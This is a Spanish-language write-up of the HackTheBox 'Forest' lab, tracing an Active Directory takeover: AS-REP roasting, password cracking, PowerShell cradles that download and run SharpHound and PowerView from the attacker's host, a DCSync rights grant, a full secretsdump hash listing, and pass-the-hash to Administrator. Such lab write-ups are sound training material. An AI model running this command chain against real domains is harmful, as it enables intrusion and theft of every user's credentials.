Forest - HackTheBox
Empece haciendo un escaneo con Nmap para detectar puertos y servicios abiertos de la maquina.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 --open -v -n 10.10.10.161 -oN targeted
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 15:58 CEST
Initiating Ping Scan at 15:58
Scanning 10.10.10.161 [4 ports]
Completed Ping Scan at 15:58, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:58
Scanning 10.10.10.161 [1000 ports]
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Completed SYN Stealth Scan at 15:58, 0.42s elapsed (1000 total ports)
Nmap scan report for 10.10.10.161
Host is up (0.086s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
Raw packets sent: 1243 (54.668KB) | Rcvd: 1099 (44.000KB)
Viendo que era un Domain Contoller le lance la herramienta enum4linux para que me haga un reconocimiento de la maquina, vi que pudé enumerar usuarios del dominio, para hacerlo de una manera mas comoda hice uso de la herramienta de s4vitar, rpcenum.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ ./rpcenum -e DUsers -i 10.10.10.161
[*] Enumerating Domain Users...
+ +
| Users |
+ +
| Administrator |
| Guest |
| krbtgt |
| DefaultAccount |
| $331000-VK4ADACQNUCA |
| SM_2c8eef0a09b545acb |
| SM_ca8c2ed5bdab4dc9b |
| SM_75a538d3025e4db9a |
| SM_681f53d4942840e18 |
| SM_1b41c9286325456bb |
| SM_9b69f1b9d2cc45549 |
| SM_7c96b981967141ebb |
| SM_c75ee099d0a64c91b |
| SM_1ffab36a2f5f479cb |
| HealthMailboxc3d7722 |
| HealthMailboxfc9daad |
| HealthMailboxc0a90c9 |
| HealthMailbox670628e |
| HealthMailbox968e74d |
| HealthMailbox6ded678 |
| HealthMailbox83d6781 |
| HealthMailboxfd87238 |
| HealthMailboxb01ac64 |
| HealthMailbox7108a4e |
| HealthMailbox0659cc1 |
| sebastien |
| lucinda |
| svc-alfresco |
| andy |
| mark |
| santi |
| aliasnoname |
+ +
Me logro encontrar una serie de usuarios, los introduje en un archivo .txt.
Intente hacer un ataque ASREPRoast, dumpear un hash net NTLM v2 sin autenticacion con credenciales al protocolo kerberos y funciono.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -format john -no-pass -k -usersfile users.txt -dc-ip 10.10.10.161 HTB.LOCAL/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$svc-alfresco@HTB.LOCAL:23afd64cd88e624b32bd7d23c79a3dc6$d47730e650f2dc81097c6b86ec7603325a2851902530c1968ace2d6c2858e4bee5092ffb1cd0769dece363e835dac58341a376da2a4169dec1278f869f7ff8731e02ac421d90058e9b69144986d86f700671ad1d95adbf8f4e88c33f5a7d19566c59a93ea1122aac2a3d107b7843efd584fa21c9a44cf31ce82d27f4d780a6e72159cb70297ddda75ed2b837bab2f59f9dadf60480c598d923fa02fb1816c3e48fe83e5e1d09c0f253bdd922cc05ac051b53089eafae89557d5be89f4d8d1a3ffa7bd81fc0821b643e4fa3380c3a378c892c5bf83d10da2a47af988dad163c140b0f5da73bbe
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User aliasnoname doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] invalid principal syntax
Logre conseguir el hash net NTLM v2 del usuario svc-alfresco, este hash no me servia para hacer pass the hash pero si podia crackearlo por fuerza bruta, para ello hice uso de la herramienta john the ripper.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$svc-alfresco@HTB.LOCAL)
1g 0:00:00:08 DONE (2021-07-28 16:02) 0.1210g/s 494644p/s 494644c/s 494644C/s s3xirexi..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Me lo logro crackear y consegui autenticarme por evil-winrm.
Ya pude visualizar la “flag” del usuario.
ESCALADA DE PRIVILEGIOS
Para la escalada de privilegios hice uso de BloodHound para ver el vector en forma de nodos, me transferi SharpHound, el recopilador de datos de BloodHound, la transferencia la hice con el siguiente comando de Powershell teniendo un servidor de python abierto por el puerto 80.
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.18/SharpHound.ps1')
Me cree el zip con SharpHound que contiene archivos .json y lo transferi a mi equipo creando un recurso compartido con smb y dandole soporte a la version dos de smb.
Importe el zip a BloodHound
Una vez cargado me mostro el vector de ataque para la escalada.
Vi que el usuario formaba parte del grupo "Exchange Windows Permissions", tambien encontre que los derechos writeDACL le podian otorgar permisos DCSync a nuestro usuario, es decir que podia modificar la ACL y hacer un ataque DCSync, antes de añadir nuestro usuario al grupo "Exchange Windows Permissions" voy a transferirme PowerView.ps1 para poder llevar a cabo el ataque, para ello hice uso del siguiente comando con un servior por python corriendo por el puerto 80.
IEX(New-Object Net.WebClient).downloadString("http://10.10.16.18/PowerView.ps1")
Ahora sí añadi el usuario al grupo "Exchange Windows Permission" con el siguiente comando.
net group "Exchange Windows Permission" svc-alfresco /add /domain
Y le otorgo permisos DCSync al usuario svc-alfresco con los siguientes comandos.
pass = convertto-securestring 's3rvice' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc-alfresco -Rights DCSync
Con secretdumps.py logre dumpear los hashes NTLM de los usuarios.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
nandu143:7602:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
zarrius:7603:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:9fa7b3a466d7f60bdea20508ad0cce8b:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:f00989c52e7023d887eeef842edf8914bbb6454b7758b2f06e3ddba54a04fea9
htb.local\andy:aes128-cts-hmac-sha1-96:06b8232f7de3a1326f39bb879d0a3654
htb.local\andy:des-cbc-md5:23ba0d0b40fed56b
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
nandu143:aes256-cts-hmac-sha1-96:8a77a9d28cc5eccd4406b81fc81a5fd7fcbcb94d71b3722da96ce25cdc15b675
nandu143:aes128-cts-hmac-sha1-96:b281bede93f7a2479cd7ffa85c55b972
nandu143:des-cbc-md5:fe5b7f6b5d5b6115
zarrius:aes256-cts-hmac-sha1-96:996715fddf27e9b99d7e90dd345b7d5e0ce4e25dc247c260299c4b5c09e90e74
zarrius:aes128-cts-hmac-sha1-96:f0be6d6d5c56731461018c87c4f7f14f
zarrius:des-cbc-md5:b0f858ea0462195d
FOREST$:aes256-cts-hmac-sha1-96:ecef71035db507605eec52e1944e25bd7f693caa5c190bc04e02e9c5e4d4a887
FOREST$:aes128-cts-hmac-sha1-96:30f8191f116ea008f7ce511707d8ae47
FOREST$:des-cbc-md5:f7cbc48364ba79c4
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
Hice pass the hash con wmiexec haciendo uso del hash NTLM del usuario Administrador y logre prilegios maximos.
Ya pude visualizar la “flag” de root
Leave a comment